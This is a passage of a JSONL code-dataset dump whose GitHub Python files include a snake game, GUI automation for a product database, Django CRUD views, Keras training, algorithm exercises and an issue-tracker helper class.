snake[0][1])\r\n \r\n screen.fill((0, 0, 0))\r\n screen.blit(apple, apple_pos)\r\n print(apple_pos)\r\n for pos in snake:\r\n screen.blit(snake_skin, pos)\r\n pygame.display.update()\r\n","repo_name":"AlanSouza-19/Snake","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"19700593974","text":"from subprocess import Popen\nfrom pywinauto import Desktop\nfrom pywinauto import Application\nimport pyautogui\nimport pandas as pd\nfrom pandas import ExcelWriter\nfrom pandas import ExcelFile\nfrom pywinauto.application import Application\nimport time\nimport csv\nimport os\nimport sys\nimport pywinauto\nfrom datetime import datetime\n\n\nfrom functions.functions_utils import tm_init\n\n## get the appliation handler from the init function\ntempla = tm_init()[0]\napp = tm_init()[1]\n\n## start \ntempla.child_window(title='Product List', control_type='TabItem').click_input()\nmainProductsWindow = templa.child_window(title='Product List', control_type='Window')\n\n########################\n#\n# Setup Excel Sheet\n#\n########################\nsheetLoader = 'Add Product' \ndf = pd.read_excel('test.xlsx', sheet_name=sheetLoader)\nprint(\"starting...\")\n\nfor i in df.index:\n productCode = df['PRODUCT-CODE']\n category = df['CATEGORY']\n supplierCode = df['SUPPLIER-CODE']\n supplierCodeRe = df['SUPPLIER-CODE-RE']\n itemName = df['ITEMS']\n cost = df['COST']\n salePrice = df['SALE PRICE']\n clientName = df['CLIENT NAME']\n status = df['STATUS']\n prefer = df['PREFERRED']\n unit = df['UNIT']\n preferString = str(int(prefer[i]))\n\n if status[i] == \"Done\" or status[i] == \"Skip\":\n print(str(productCode[i]) + \" is Done\")\n continue\n\n if status[i] == \"Stop\":\n print(\"Stop here\")\n break\n\n\n\n # # If the product exists\n # # click on the \"Code\" Edit Box\n # mainProductsWindow.window(title='Code', control_type='ComboBox').click_input()\n # pyautogui.typewrite(str(productCode[i]))\n\n # click on the \"Product group\" Edit Box\n # print(\"select product group...\")\n # mainProductsWindow.window(title='Product group', control_type='ComboBox').click_input()\n # pyautogui.typewrite(category[i])\n # pyautogui.moveRel(20, 25) \n # pyautogui.click()\n # templa.child_window(title=\"Copy\", control_type=\"Button\").click_input()\n # print(\"copied one product..\")\n\n\n\n\n\n # # click on the Code Edit Box\n # mainProductsWindow.window(title='Code', control_type='ComboBox').click_input()\n # pyautogui.typewrite(str(productCode[i]))\n\n # # if no product showing, then click on clear fileter button\n # # and try next one\n # productItem = mainProductsWindow.child_window(title=str(productCode[i]), control_type=\"DataItem\")\n # if productItem.exists():\n # # click clear button\n # print (str(productCode[i]) + \" Exist\")\n # mainProductsWindow.window(title='Description', control_type='ComboBox').click_input()\n \n # else: \n # print (str(productCode[i]) + \" Product not exist, continue...\")\n # #\n\n # #######################################\n # #\n # # Copy old Products\n # #\n # #######################################\n # # click on other textbox first to deselect text\n # mainProductsWindow.window(title='Description', control_type='ComboBox').click_input()\n\n\n\n # indent once below\n\n # click on the Code Edit Box\n mainProductsWindow.window(title='Code', control_type='ComboBox').click_input()\n \n #######################################\n #\n # Setup Copied Product Code\n #\n #######################################\n\n # Setup Copied Product Code.\n # if not all the same setup in Excel Sheet\n # for example copy product CODE URB120\n existingCode = str(productCode[i])\n pyautogui.typewrite(existingCode)\n mainProductsWindow.child_window(title=existingCode, control_type=\"DataItem\").click_input()\n\n\n\n\n\n # Click COPY to copy the product\n templa.child_window(title=\"Copy\", control_type=\"Button\").click_input()\n\n productDetailWindow = app.window(title_re='Products - *')\n productDetailWindow.wait('exists', timeout=15)\n\n #productDetailWindow.print_control_identifiers()\n # Type code\n productDetailWindow.child_window(auto_id=\"txtCode\", control_type=\"Edit\").click_input()\n pyautogui.typewrite(productCode[i])\n\n # just tab will select all text, no need to clear manually\n pyautogui.press('tab')\n pyautogui.typewrite(itemName[i])\n\n print(\"general info filled\")\n ###################################\n # \n # Need add Product code in the first page\n #\n ###################################\n \n # Go to Price Group, change selling price\n productDetailWindow.window(title='Price groups', control_type='TabItem').click_input()\n # find the Client Name\n priceGroupTextBox = productDetailWindow.child_window(title=clientName[i], control_type=\"DataItem\")\n FixedPriceTextBox = priceGroupTextBox.child_window(title=\"Fixed price\", control_type=\"Edit\")\n FixedPriceTextBox.click_input()\n pyautogui.typewrite(str(salePrice[i]))\n print (\"Sale Price is: \" + str(salePrice[i]))\n\n\n # then change the cost price\n productDetailWindow.window(title='Suppliers', control_type='TabItem').click_input()\n\n supplierEntry = productDetailWindow.child_window(title_re=supplierCodeRe[i])\n if not supplierEntry.exists():\n productDetailWindow.Add.click_input()\n print (\"supplier not exist in the list\")\n # open new supplier detail window\n productSupplierWindow = productDetailWindow.child_window(title_re='Product suppliers - *')\n productSupplierWindow.wait('exists', timeout=15)\n # add supplier name by code\n # the supplier text box is focused by default\n print (\"add supplier\")\n pyautogui.typewrite(supplierCode[i])\n pyautogui.press('tab')\n preferredCheckbox = productSupplierWindow.child_window(auto_id=\"chkIsPreferredSupplier\", control_type=\"CheckBox\")\n isChecked = preferredCheckbox.get_toggle_state()\n\n # check if match with Excel sheet data\n if str(isChecked) != preferString:\n preferredCheckbox.toggle()\n # you can also use tab tab to go down\n pyautogui.press('tab')\n pyautogui.press('tab')\n pyautogui.typewrite(str(productCode[i]))\n pyautogui.press('tab')\n # check prefer checkbox\n # add/change price\n #productSupplierWindow.child_window(auto_id=\"numUnitCost\", control_type=\"Edit\").click_input()\n pyautogui.typewrite(str(cost[i]))\n print (\"Buying Price entered: \" + str(cost[i]))\n\n else: \n # open specific supplier item\n supplierEntry.click_input(button='left', double=True)\n productSupplierWindow = productDetailWindow.child_window(title_re='Product suppliers - *')\n productSupplierWindow.wait('exists', timeout=15)\n # add/change price\n productSupplierWindow.child_window(auto_id=\"numUnitCost\", control_type=\"Edit\").click_input()\n pyautogui.typewrite(str(cost[i]))\n pyautogui.keyDown('shift')\n pyautogui.press('tab')\n pyautogui.keyUp('shift')\n pyautogui.typewrite(str(productCode[i]))\n\n pyautogui.press('tab')\n\n # Save\n productSupplierWindow.Accept.click_input()\n pyautogui.PAUSE = 2.5\n productDetailWindow.Save.click_input()\n pyautogui.PAUSE = 2.5\n print (str(productCode[i]) + \" is Done now\")\n\nprint (\"###################################\")\nprint (\" \")\n\n\n\n \n\n\n","repo_name":"allan-2stars/Templa-Auto","sub_path":"ProductCopy.py","file_name":"ProductCopy.py","file_ext":"py","file_size_in_byte":7178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"20422754061","text":"from struct import pack\n\nimport ncs\nimport ncs.maapi as maapi\nimport ncs.maagic as maagic\n\ndef is_ha_master_or_no_ha():\n with maapi.single_read_trans(\"\", \"system\", db=ncs.OPERATIONAL) as trans:\n if trans.exists(\"/tfnm:ncs-state/tfnm:ha\"):\n mode = str(maagic.get_node(trans, '/tfnm:ncs-state/tfnm:ha/tfnm:mode'))\n return (mode == 'master')\n else:\n return True\n\ndef is_ha_slave():\n with maapi.single_read_trans(\"\", \"system\", db=ncs.OPERATIONAL) as trans:\n if trans.exists(\"/tfnm:ncs-state/tfnm:ha\"):\n mode = str(maagic.get_node(trans,\n '/tfnm:ncs-state/tfnm:ha/tfnm:mode'))\n return (mode == 'slave' or mode == 'relay-slave')\n return False\n\ndef IPNetwork(network):\n addr = str(network).split('/')\n if ':' in network:\n return IPv6Network(address = addr[0], prefix_len = addr[1])\n else:\n return IPv4Network(address = addr[0], prefix_len = addr[1])\n\nclass IPv4Network:\n def __init__(self, address, prefix_len):\n IPV4LENGTH = 32\n self._ALL_ONES = pow(2, IPV4LENGTH) - 1\n self.version = 'ipv4'\n self.address = address\n self.subnet_mask = self._create_subnet_mask(prefix_len)\n\n def _create_subnet_mask(self, prefix_len_str):\n ipint = self._ALL_ONES ^ (self._ALL_ONES >> int(prefix_len_str))\n octets = []\n for _ in xrange(4):\n octets.insert(0, str(ipint & 0xFF))\n ipint >>= 8\n return '.'.join(octets)\n\nclass IPv6Network:\n def __init__(self, address, prefix_len):\n IPV6LENGTH = 128\n self._ALL_ONES = pow(2, IPV6LENGTH) - 1\n self.version = 'ipv6'\n self.address = address\n self.subnet_mask = self._create_subnet_mask(prefix_len)\n\n def _create_subnet_mask(self, prefix_len_str):\n ipint = self._ALL_ONES ^ (self._ALL_ONES >> int(prefix_len_str))\n hex_str = '%032x' % ipint\n hextets = []\n for x in range(0, 32, 4):\n hextets.append('%x' % int(hex_str[x:x+4], 16))\n return ':'.join(self._compress_hextets(hextets))\n\n def _compress_hextets(self, hextets):\n best_doublecolon_start = -1\n best_doublecolon_len = 0\n doublecolon_start = -1\n doublecolon_len = 0\n for index in range(len(hextets)):\n if hextets[index] == '0':\n doublecolon_len += 1\n if doublecolon_start == -1:\n # Start of a sequence of zeros.\n doublecolon_start = index\n if doublecolon_len > best_doublecolon_len:\n # This is the longest sequence of zeros so far.\n best_doublecolon_len = doublecolon_len\n best_doublecolon_start = doublecolon_start\n else:\n doublecolon_len = 0\n doublecolon_start = -1\n\n if best_doublecolon_len > 1:\n best_doublecolon_end = (best_doublecolon_start +\n best_doublecolon_len)\n # For zeros at the end of the address.\n if best_doublecolon_end == len(hextets):\n hextets += ['']\n hextets[best_doublecolon_start:best_doublecolon_end] = ['']\n # For zeros at the beginning of the address.\n if best_doublecolon_start == 0:\n hextets = [''] + hextets\n return hextets\n\ndef is_notif_handling_required():\n with maapi.single_read_trans(\"\", \"system\", db=ncs.RUNNING) as trans:\n if trans.exists(\"/nfvo-rel2:nfvo/nfvo-rel2-esc:settings-esc\"):\n handling_required = str(trans.get_elem(\"/nfvo-rel2:nfvo/nfvo-rel2-esc:settings-esc/nfvo-rel2-esc:netconf-subscription/nfvo-rel2-esc:default-subscriber\"))\n if 'true' == handling_required:\n return True\n else:\n return False\n","repo_name":"rishan02/packages-nfv-3.4.5","sub_path":"tailf-etsi-rel2-nfvo-esc/python/tailf_etsi_rel2_nfvo_esc/internal_utils.py","file_name":"internal_utils.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"39306255639","text":"# pylint: disable= missing-module-docstring, missing-function-docstring\nfrom os import environ\nfrom unittest.mock import patch\nfrom environ import to_config\nfrom goals.config import AppConfig\n\n\n@patch.dict(environ, {}, clear=True)\ndef test_when_environment_is_empty_expect_9001_prometheus_port():\n cnf = to_config(AppConfig)\n assert cnf.prometheus_port == 9001\n\n\n@patch.dict(environ, {}, clear=True)\ndef test_when_environment_is_empty_expect_warning_log_level():\n cnf = to_config(AppConfig)\n assert cnf.log_level == \"WARNING\"\n\n\n@patch.dict(environ, {\"GOALS_PROMETHEUS_PORT\": \"9004\"}, clear=True)\ndef test_when_environment_has_prometheus_port_9004_expect_9004():\n cnf = to_config(AppConfig)\n assert cnf.prometheus_port == 9004\n\n\n@patch.dict(environ, {\"GOALS_LOG_LEVEL\": \"DEBUG\"}, clear=True)\ndef test_when_environment_debug_log_level_expect_debug():\n cnf = to_config(AppConfig)\n assert cnf.log_level == \"DEBUG\"\n\n\n@patch.dict(environ, {}, clear=True)\ndef test_when_environment_sentry_enabled_is_not_set_expect_false():\n cnf = to_config(AppConfig)\n assert not cnf.sentry.enabled\n\n\n@patch.dict(\n environ, {\"GOALS_SENTRY_ENABLED\": \"true\"}, clear=True\n)\ndef test_when_environment_sentry_enabled_is_true_expect_true():\n cnf = to_config(AppConfig)\n assert cnf.sentry.enabled\n\n\n@patch.dict(environ, {}, clear=True)\ndef test_when_sentry_dsn_is_empty_expect_localhost():\n cnf = to_config(AppConfig)\n assert cnf.sentry.dsn == \"https://token@sentry.ingest.localhost\"\n\n\n@patch.dict(\n environ,\n {\"GOALS_SENTRY_DSN\": \"https://wf313c@24t2tg2g.ingest.sentry.io/33433\"},\n clear=True\n)\ndef test_when_sentry_dsn_has_sentry_url_expect_it():\n cnf = to_config(AppConfig)\n assert cnf.sentry.dsn == \"https://wf313c@24t2tg2g.ingest.sentry.io/33433\"\n","repo_name":"Taller-2-FIUBA/goals","sub_path":"tests/config_test.py","file_name":"config_test.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"19180027945","text":"\"\"\"\nGiven an array of non-negative integers, and a value sum, determine if there is a subset of the given set with sum equal to given sum. \n\n\nExample 1:\n\nInput:\nN = 6\narr[] = {3, 34, 4, 12, 5, 2}\nsum = 9\nOutput: 1 \nExplanation: Here there exists a subset with\nsum = 9, 4+3+2 = 9.\n\"\"\"\n\n\n\n\n \nclass Solution:\n def isSubsetSum (self, N, arr, sum):\n # code here \n t = [[0 for j in range(sum + 1)] for i in range(N + 1)]\n # Initialization \n for i in range(N + 1):\n for j in range(sum + 1):\n if(i == 0):\n t[i][j] = False\n if(j == 0):\n t[i][j] = True\n \n for i in range(1, N + 1):\n for j in range(1, sum + 1):\n if(arr[i - 1] <= j):\n t[i][j] = t[i-1][j-arr[i - 1]] or t[i-1][j]\n #DP[i][j] = DP[i-1][j] OR DP[i-1][j-A[i-1]]\n else:\n t[i][j] = t[i-1][j]\n \n return t[N][sum]\n \n \n \n \n\n#{ \n# Driver Code Starts\n#Initial Template for Python 3\n\nif __name__ == '__main__': \n t = int (input ())\n for _ in range (t):\n N = int(input())\n arr = input().split()\n for itr in range(N):\n arr[itr] = int(arr[itr])\n sum = int(input())\n\n ob = Solution()\n if ob.isSubsetSum(N,arr,sum)==True:\n print(1)\n else :\n print(0)","repo_name":"shu3102/practice","sub_path":"DP/subsetSumProblem.py","file_name":"subsetSumProblem.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"71487037744","text":"import numpy as np\nimport argparse\nfrom f1_score4sentence import f1_scores\nimport keras\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\n\nimport pickle\n\nfrom model3_fit_generator_test import RNet\nfrom generators import data_generator\nimport sys\nsys.setrecursionlimit(100000)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--hdim', default=128, help='Model to evaluate', type=int)\nparser.add_argument('--batch_size', default=64, help='Batch size', type=int)\nparser.add_argument('--nb_epochs', default=50, help='Number of Epochs', type=int)\n#parser.add_argument('--optimizer', default='Adadelta', help='Optimizer', type=str)\nparser.add_argument('--optimizer', default='Adam', help='Optimizer', type=str)\nparser.add_argument('--lr', default=None, help='Learning rate', type=float)\nparser.add_argument('--name', default='', help='Model dump name prefix', type=str)\nparser.add_argument('--loss', default='sparse_categorical_crossentropy', help='Loss', type=str)\n\nparser.add_argument('--dropout', default=0, type=float)\nparser.add_argument('--char_level_embeddings', action='store_true')\n\n# parser.add_argument('model', help='Model to evaluate', type=str)\nargs = parser.parse_args()\n\n\nprint('Loading datasets...', end='')\ndatas = data_generator('../../train_process_final_fasttext.pkl', args.batch_size, val_rate=0.1)\nprint('Creating the model...', end='')\nmodel = RNet(hdim=args.hdim, dropout=args.dropout, p_length=170, q_length=35,\n char_level_embeddings=args.char_level_embeddings)\nprint('Done!')\n\nprint('Compiling Keras model...', end='')\noptimizer_config = {'class_name': args.optimizer,\n 'config': {'lr': args.lr} if args.lr else {}}\n\nf1_ = f1_scores()\nmodel.compile(optimizer=optimizer_config,\n loss=args.loss,\n metrics=['accuracy'])\nprint('Done!')\n\nprint('Training...', end='')\n\npath = 'models_fasttext/' + args.name + '{epoch}-t{loss}-v{val_loss}_fit_generator.model'\n\n\ncall_backs = [ModelCheckpoint(path, verbose=1, save_best_only=True),\n EarlyStopping(monitor='val_loss', patience=5), f1_]\n\n## model fit_generator\nvalx, valy = datas.val_generator()\nmodel.fit_generator(generator=datas.train_generator(), \n steps_per_epoch=datas.train_steps,\n validation_data=(valx, valy),\n validation_steps=1,\n epochs=30,\n callbacks=call_backs)\n\n#model.save('./models_fasttext/Final_model_fit_generator.h5')\n\nprint('Training Done!')\n","repo_name":"jasonluo-tw/ChineseQA","sub_path":"R-NET-Keras/train_fit_generator_test.py","file_name":"train_fit_generator_test.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"8781792599","text":"# https://leetcode.com/problems/valid-triangle-number/\nfrom itertools import combinations\nimport bisect\nclass Solution:\n # gets a TLE since we're generating all combinations\n def triangleNumber2(self, nums: List[int]) -> int:\n count = 0\n \n for c in combinations(nums, 3):\n # 3 sides of the triangle\n x = c[0]\n y = c[1]\n z = c[2]\n \n if x + y > z and y + z > x and z + x > y:\n count +=1\n \n return count\n\n # time complexity is n^2 logn\n # n^2 since we're doing 2 for loops, and logn because of binary search\n def triangleNumber(self, nums: List[int]) -> int:\n count = 0\n nums.sort()\n # since input can have 0, and a side of a triangle cannot be 0, we ignore 0s\n nums = [x for x in nums if x != 0]\n \n n = len(nums)\n \n for i in range(0, n):\n for j in range(i+1, n):\n # i is the 1st side, j is second side, which can start from i+1\n # k is 3rd side, which can start from i+2\n # now k can increase beyond i+2 theoretically up till n-1\n\n # because nums is sorted with positive integers\n # we use binary search to find the max index of k, such that\n # nums[i] + nums[j] > nums[k] -- this is a condition for a valid triangle\n \n # in general, the valid condition is sum of any 2 sides > 3rd side\n # we don't care for nums[j] + nums[k] > nums[i] or nums[i] + nums[k] > nums[j]\n # why? because nums is sorted and those 2 conditions are auto satisfied\n k = bisect.bisect_left(nums, nums[i] + nums[j])\n \n # ie, all triangles for fixed i,j and maximum ks are counted toward the answer\n # say if input was [6,10,11,12,13,14,15,16,20] and i=0, j=1, ie, 6 and 10\n # then side k can be 11, 12, 13, 14, 15, ie, max k can be index of 15, ie, k=6\n # note that bisect left above will give value 7, that is why we do k-1 below\n count += (k-1)-j\n \n return count","repo_name":"abhisha1991/LeetCodePractice","sub_path":"Python/ValidTriangleNumber.py","file_name":"ValidTriangleNumber.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"40145479065","text":"# -*- coding:utf-8 -*-\r\n__author__ = 'wenhao Yin '\r\n__copyright__ = 'Copyright 2016 wenhao'\r\n\r\n'''\r\n mqtt Worker: handle mqtt messages and put them to mongodb\r\n\r\n'''\r\n\r\nfrom celery import Celery\r\nimport config\r\n\r\n\r\napp = Celery('celeryTasks',\r\n broker='pyamqp://guest@localhost//',\r\n include=['celeryTasks.tasks', 'celeryTasks.repeatTasks'])\r\napp.config_from_object(config)\r\napp.conf.task_routes = {'celeryTasks.repeatTasks.*': {'queue': 'repeat'}}","repo_name":"akm8877m16/dianfengNewBackend","sub_path":"celeryTasks/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"20633265392","text":"#!/usr/bin/python\n\n# Example (make sure findPhase.py is executable and is in the current directory):\n# $ ./findPhase.py\n\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\n#####################################################################################\n\n\n\ndef phs_est_adaptive_filter(data):\n iqresult = [0,0]\n for iqSelection in range(2):\n data_one_arm = data[iqSelection:len(data):2]\n phs_est = find_phase_regression(data_one_arm)\n iqresult[iqSelection] = phs_est\n\n #return modmPitoPi(iqresult[0] - iqresult[1] + np.pi/2)\n return modmPitoPi((iqresult[0] + (iqresult[1] - np.pi/2))/2)\n\n\ndef find_phase_regression(d, phs_truth=\"\"):\n\n print(np.mean(d))\n plt.use('Agg')\n plt.plot(d)\n plt.ylabel('some numbers')\n plt.show()\n # Find frequency\n D = np.abs(np.fft.fftshift(np.fft.fft(d * np.hamming(len(d)))))\n\n f = np.arange(-0.5, 0.5-1.0/len(d), 1.0/len(d))\n pos = D.argmax()\n\n # Create x (synthetic sin wave)\n x = np.sin(2*np.pi*np.arange(-1,len(D))*np.abs(f[pos]))\n\n\n # Compute w\n w = LS_local(np.asarray(d),x,2)\n\n # Initialize\n ph0 = 0\n ph1 = -2*np.pi*np.abs(f[pos])\n\n # Compute ph\n ph = np.arctan( (w[0]*np.sin(ph0) + w[1]*np.sin(ph1)) / (w[0]*np.cos(ph0) + w[1]*np.cos(ph1)) )\n if np.sign((w[0]*np.cos(ph0) + w[1]*np.cos(ph1))) < 0:\n ph = ph - np.pi\n\n ph = modmPitoPi(ph)\n\n\n\n if phs_truth: # determine Empty String\n phs_truth = modmPitoPi(phs_truth)\n # Check\n print(str(phs_truth) + \" = \" + str(ph) + \" ?\") # These should be (approximately) equal or off by an integer multiple of 2*pi\n else:\n #print(str(ph))\n pass\n # Return\n return ph, ErrStd\n\n\ndef modmPitoPi(phs):\n # Adjust phs_truth (-pi < phs_truth <= pi)\n while phs <= -np.pi:\n phs = phs + 2*np.pi\n while phs > np.pi:\n phs = phs - 2*np.pi\n return phs\n\ndef LS_local(d,x,Lw):\n\n # Initialize\n d = d.astype('double')\n x = x.astype('double')\n\n # Initialize\n Ld = len(d)\n Lx = len(x)\n #print(Lx)\n\n # Check\n if Lx != (Ld + Lw - 1):\n raise Exception('Length of x or length of d is incorrect.')\n\n # Build R\n xx = np.zeros((Lw,Ld))+1\n #print(xx)\n for i in range(Lw):\n xx[i] = x[Lw-i-1:Lw-i-1+Ld]\n R = np.dot(xx, xx.transpose())\n\n # Build p\n p = np.dot(d, xx.transpose())\n\n # Compute w\n w = np.dot(np.linalg.inv(R), p.transpose())\n\n return w\n\n#####################################################################################\n\n# Main\nif __name__ == '__main__':\n for c in np.arange(24):\n find_phase_regression(np.sin(2*np.pi*np.arange(1000)/100 + np.pi/12*c),np.pi/12*c)\n","repo_name":"xiapeiqing/ti_aoa","sub_path":"Host_workspaces/python_ws/pyHostDsp/CWphsEst.py","file_name":"CWphsEst.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"} +{"seq_id":"25843440477","text":"from django.shortcuts import render\nfrom rest_framework import viewsets, status, renderers\nfrom rest_framework.decorators import api_view, detail_route\nfrom rest_framework.reverse import reverse\nfrom rest_framework.response import Response\n\nfrom .models import Test, Question, Category\nfrom .serializers import TestSerializer, QuestionSerializer, CategorySerializer\n\nclass CategoryViewSet(viewsets.ModelViewSet):\n queryset = Category.objects.all()\n serializer_class = CategorySerializer\n\n @detail_route()\n def getTests(self, request, *args, **kwargs):\n \"\"\"\n Get tests of a category\n \"\"\"\n testQuery = Test.objects.filter(category=kwargs['pk'])\n serializer = TestSerializer(testQuery, many=True)\n return Response(serializer.data)\n\nclass TestViewSet(viewsets.ModelViewSet):\n queryset = Test.objects.all()\n serializer_class = TestSerializer\n\n @detail_route()\n def getQuestions(self, request, *args, **kwargs):\n \"\"\"\n Get questions of a test\n \"\"\"\n questionQuery = Question.objects.filter(test=kwargs['pk'])\n serializer = QuestionSerializer(questionQuery, many=True)\n return Response(serializer.data)\n\nclass QuestionViewSet(viewsets.ModelViewSet):\n queryset = Question.objects.all()\n serializer_class = QuestionSerializer\n\n@api_view(['GET'])\ndef exams_root(request, format=None):\n return Response({\n 'categories': reverse('category-list', request=request, format=format),\n 'tests': reverse('test-list', request=request, format=format),\n 'questions': reverse('question-list', request=request, format=format),\n })","repo_name":"rcook7/resources","sub_path":"exams/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"7119811143","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Product\n\n@login_required\ndef create_product(request):\n if request.method == 'POST':\n product = Product(\n name=request.POST['name'],\n price=request.POST['price'],\n quantity=request.POST['quantity'],\n category=request.POST['category'],\n description=request.POST['description'],\n user=request.user\n )\n product.save()\n return redirect('product_list')\n return render(request, 'product/create_product.html')\n\n@login_required\ndef product_list(request):\n products = Product.objects.filter(user=request.user)\n return render(request, 'product/product_list.html', {'products': products})\n\n@login_required\ndef edit_product(request, product_id):\n product = get_object_or_404(Product, id=product_id, user=request.user)\n if request.method == 'POST':\n product.name = request.POST['name']\n product.price = request.POST['price']\n product.quantity = request.POST['quantity']\n product.category = request.POST['category']\n product.description = request.POST['description']\n product.save()\n return redirect('product_list')\n return render(request, 'product/edit_product.html', {'product': product})\n\n@login_required\ndef delete_product(request, product_id):\n product = get_object_or_404(Product, id=product_id, user=request.user)\n product.delete()\n return redirect('product_list')\n","repo_name":"redfieldC/MultiUser-CRUD-for-Products","sub_path":"project/product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"72171087023","text":"\"\"\"Issue object for working with issue tracker issues\"\"\"\n\nimport copy\nimport re\nfrom issue_tracker.change_tracking_list import ChangeTrackingList\nfrom issue_tracker.utils import parseDateTime\n\nclass Issue(object): # pragma: no cover\n def __init__(self, issue_entry):\n self.id = issue_entry.get('id')\n\n self.blocked_on = [e['issueId'] for e in issue_entry.get('blockedOn', [])]\n self.blocking = [e['issueId'] for e in issue_entry.get('blocking', [])]\n\n self.merged_into = issue_entry.get('mergedInto', {}).get('issueId')\n\n self.created = parseDateTime(issue_entry.get('published'))\n self.updated = parseDateTime(issue_entry.get('updated'))\n\n if issue_entry.get('closed', []):\n self.closed = parseDateTime(issue_entry.get('closed', []))\n else:\n self.closed = None\n\n self.summary = issue_entry.get('summary')\n self.description = issue_entry.get('description')\n self.reporter = issue_entry.get('author', {}).get('name')\n self.owner = issue_entry.get('owner', {}).get('name')\n self.status = issue_entry.get('status')\n self.stars = issue_entry.get('stars')\n self.open = issue_entry.get('state') == 'open'\n self.labels = ChangeTrackingList(issue_entry.get('labels', []))\n self.components = ChangeTrackingList(issue_entry.get('components', []))\n self.cc = ChangeTrackingList([e['name'] for e in issue_entry.get('cc', [])])\n\n self.dirty = False\n\n def __setattr__(self, name, value):\n self.__dict__.setdefault('dirty', False)\n self.__dict__.setdefault('changed', set())\n\n # If dirty flag was reset to false.\n if name == 'dirty' and not value:\n self.__dict__['labels'].reset()\n self.__dict__['cc'].reset()\n self.__dict__['changed'].clear()\n self.__dict__['dirty'] = value\n else:\n self.__dict__[name] = value\n self.__dict__['dirty'] = True\n self.__dict__['changed'].add(name)\n\n def addLabel(self, label):\n if not self.hasLabel(label):\n self.labels.append(label)\n self.dirty = True\n\n def __remove_label(self, label):\n for l in self.labels:\n if l.lower() == label.lower():\n self.labels.remove(l)\n self.dirty = True\n return\n\n def removeLabel(self, label):\n if self.hasLabel(label):\n self.__remove_label(label)\n self.addLabel('-%s' % label)\n\n def removeLabelByPrefix(self, prefix):\n labels = self.getLabelsByPrefix(prefix)\n for label in labels:\n self.removeLabel(label)\n\n def addCc(self, cc):\n if not self.hasCc(cc):\n self.cc.append(cc)\n self.dirty = True\n\n def removeCc(self, cc):\n if self.hasCc(cc):\n self.cc.remove(cc)\n self.dirty = True\n\n def getLabelsByPrefix(self, prefix):\n return self.getLabelsContaining('%s.*' % prefix)\n\n def getLabelByPrefix(self, prefix):\n rtn = self.getLabelsByPrefix(prefix)\n if rtn:\n return rtn[0]\n return None\n\n def getLabelsContaining(self, regex):\n rtn = []\n for label in self.labels:\n if re.match(regex, label, re.DOTALL | re.IGNORECASE):\n rtn.append(label)\n return rtn\n\n def getLabelsMatching(self, regex):\n return self.getLabelsContaining(regex + '\\Z')\n\n def hasLabelContaining(self, regex):\n for label in self.labels:\n if re.search(regex, label, re.DOTALL | re.IGNORECASE):\n return True\n return False\n\n def hasLabelMatching(self, regex):\n return self.hasLabelContaining(regex + '\\Z')\n\n def hasLabel(self, value):\n for label in self.labels:\n if label.lower() == value.lower():\n return True\n return False\n\n def hasCc(self, value):\n for cc in self.cc:\n if cc.lower() == value.lower():\n return True\n return False\n","repo_name":"eunchong/infra","sub_path":"appengine/chromium_try_flakes/issue_tracker/issue.py","file_name":"issue.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"15715063161","text":"from abc import abstractmethod\nfrom modules.config.setting import SERVER_IP, PLATFORM_DOMAIN\nfrom modules.task.models import TaskConfigItem\n\n\nclass BaseTemplate:\n template_info = {\n \"name\": \"\", # 组件名\n \"title\": \"\", # 组件展示标题名\n \"author\": \"\", # 组件作者\n \"type\": 1, # 组件类型\n \"desc\": \"\", # 组件介绍\n \"desc_url\": \"\", # 组件使用说明链接\n \"choice_type\": 1, # 组件选择类型\n \"url_type\": 1, # 组件生成链接格式类型\n }\n\n def __init__(self):\n self.ip = SERVER_IP\n self.domain = PLATFORM_DOMAIN\n\n def run(self, key):\n task_config_item = TaskConfigItem.objects.filter(task_config__key=key)\n if task_config_item:\n config = [{\"name\": i.template_config_item.name, \"config\": i.value,}\n for i in\n task_config_item]\n else:\n config = []\n return self.generate(key, config)\n\n @abstractmethod\n def generate(self, key, config):\n pass\n","repo_name":"whitesharks/Antenna","sub_path":"modules/template/depend/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"91"} +{"seq_id":"39123306042","text":"#Importing the required libraries\r\nimport statsmodels.formula.api as smf\r\nimport numpy as np\r\nimport xgboost as xgb\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.model_selection import 